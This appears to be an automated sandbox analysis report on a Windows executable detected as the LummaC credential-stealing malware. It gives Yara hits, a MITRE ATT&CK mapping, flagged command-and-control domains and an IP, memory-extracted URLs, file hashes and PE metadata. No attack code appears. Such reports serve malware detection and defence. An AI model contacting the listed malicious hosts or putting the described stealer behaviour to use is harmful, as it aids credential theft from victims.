Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: Ag3ijL3z1w.exe PID: 7264, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Ag3ijL3z1w.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	1 OS Credential Dumping	131 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Deobfuscate/Decode Files or Information	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ag3ijL3z1w.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
relevantvoicelesskw.shop	20%	Virustotal	Browse
colorfulequalugliess.shop	20%	Virustotal	Browse
wisemassiveharmonious.shop	10%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
edurestunningcrackyow.fun	100%	URL Reputation	malware
edurestunningcrackyow.fun	100%	URL Reputation	malware
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
pooreveningfuseor.pw	0%	URL Reputation	safe
pooreveningfuseor.pw	0%	URL Reputation	safe
https://support.microsoft.	0%	URL Reputation	safe
associationokeo.shop	0%	URL Reputation	safe
turkeyunlikelyofw.shop	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
detectordiscusser.shop	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://relevantvoicelesskw.shop/apiA	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/~	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/api~	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/api6	100%	Avira URL Cloud	phishing
colorfulequalugliess.shop	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/api0	100%	Avira URL Cloud	phishing
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
wisemassiveharmonious.shop	0%	Avira URL Cloud	safe
https://relevantvoicelesskw.shop/	18%	Virustotal		Browse
https://relevantvoicelesskw.shop/apiA	11%	Virustotal		Browse
colorfulequalugliess.shop	20%	Virustotal		Browse
https://relevantvoicelesskw.shop/b	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/api0	11%	Virustotal		Browse
wisemassiveharmonious.shop	10%	Virustotal		Browse
https://relevantvoicelesskw.shop:443/apiBE2NhtLOoTLNNgOkw	100%	Avira URL Cloud	phishing
https://support.microsof	0%	Avira URL Cloud	safe
https://relevantvoicelesskw.shop/s	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/api	100%	Avira URL Cloud	malware
relevantvoicelesskw.shop	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/l	100%	Avira URL Cloud	phishing
https://relevantvoicelesskw.shop/api6	20%	Virustotal		Browse
https://relevantvoicelesskw.shop/api	22%	Virustotal		Browse
https://relevantvoicelesskw.shop/api~	3%	Virustotal		Browse
relevantvoicelesskw.shop	20%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
relevantvoicelesskw.shop	172.67.147.173	true	true	20%, Virustotal, Browse	unknown
wisemassiveharmonious.shop	unknown	unknown	true	10%, Virustotal, Browse	unknown
colorfulequalugliess.shop	unknown	unknown	true	20%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
edurestunningcrackyow.fun	true	URL Reputation: malware URL Reputation: malware	unknown
pooreveningfuseor.pw	true	URL Reputation: safe URL Reputation: safe	unknown
associationokeo.shop	true	URL Reputation: safe	unknown
colorfulequalugliess.shop	true	20%, Virustotal, Browse Avira URL Cloud: phishing	unknown
turkeyunlikelyofw.shop	true	URL Reputation: safe	unknown
detectordiscusser.shop	true	URL Reputation: safe	unknown
wisemassiveharmonious.shop	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://relevantvoicelesskw.shop/api	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
relevantvoicelesskw.shop	true	20%, Virustotal, Browse Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1705205037.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://relevantvoicelesskw.shop/apiA	Ag3ijL3z1w.exe, 00000000.00000002.1877392777.0000000003070000.00000004.00000800.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://duckduckgo.com/ac/?q=	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://relevantvoicelesskw.shop/api~	Ag3ijL3z1w.exe, 00000000.00000003.1764742560.000000000308C000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765258902.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1764592696.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765053909.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741282403.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1746883165.000000000308E000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1739179315.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741194692.000000000308D000.00000004.00000800.00020000.00000000.sdmp	true	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://relevantvoicelesskw.shop/~	Ag3ijL3z1w.exe, 00000000.00000002.1876372507.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://sectigo.com/CPS0	Ag3ijL3z1w.exe	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	Ag3ijL3z1w.exe	false	URL Reputation: safe	unknown
https://relevantvoicelesskw.shop/	Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://support.microsoft.	Ag3ijL3z1w.exe, 00000000.00000003.1713734255.00000000030A6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://relevantvoicelesskw.shop/api6	Ag3ijL3z1w.exe, 00000000.00000003.1771850830.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765053909.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1764592696.0000000003089000.00000004.00000800.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://relevantvoicelesskw.shop/api0	Ag3ijL3z1w.exe, 00000000.00000003.1744935540.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1746473876.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1730645380.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1739179315.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1742531080.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1728879216.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741194692.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741869098.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1729089345.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1743172054.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1744190634.0000000003089000.00000004.00000800.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1705205037.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://relevantvoicelesskw.shop/b	Ag3ijL3z1w.exe, 00000000.00000003.1705274256.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://relevantvoicelesskw.shop:443/apiBE2NhtLOoTLNNgOkw	Ag3ijL3z1w.exe, 00000000.00000003.1720366524.000000000308C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Ag3ijL3z1w.exe	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Ag3ijL3z1w.exe	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://relevantvoicelesskw.shop/s	Ag3ijL3z1w.exe, 00000000.00000003.1872803431.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1876372507.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://relevantvoicelesskw.shop/l	Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.147.173	relevantvoicelesskw.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1414024
Start date and time:	2024-03-22 13:53:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 55s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ag3ijL3z1w.exe renamed because original name is a hash value
Original Sample Name:	038f01c7ab34d20394b657ce5d5f3152.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:54:00	API Interceptor	10x Sleep call for process: Ag3ijL3z1w.exe modified

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.932605920092943
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Ag3ijL3z1w.exe
File size:	2'444'904 bytes
MD5:	038f01c7ab34d20394b657ce5d5f3152
SHA1:	7f82fb84c6c0aff1012675d48ba95b0558d3230f
SHA256:	28119987147a63910d12662c2008089f85571817695dcd443d02303d52479c55
SHA512:	4e0e25bfabb8882b58341205ee60f3f5dd83a9b93518aa3badd433b784531244fcc9bb07981461a6a382dbd2d1c4de211731156f8768f7cc8e61e0a7c0689a86
SSDEEP:	49152:hKmuqADBjtRsLNcMH/YShDiSeYeCnhm1nWxZKf95EhjLnFpVrQk:hqJic4/YShWNpygwZVjLnFck
TLSH:	43B51285E69DAA94DC4E007E1B0FB67C31F419AF09508E26D4685FF1D8E2D3C26FA346
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....8.e.................\............6...........@..........................p9.......%...@..................................T.....

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x769f81
Entrypoint Section:	.vmp$PH
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65FB38B6 [Wed Mar 20 19:27:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	8e037c5edb507011bc10ab16654e5d05

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe7\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\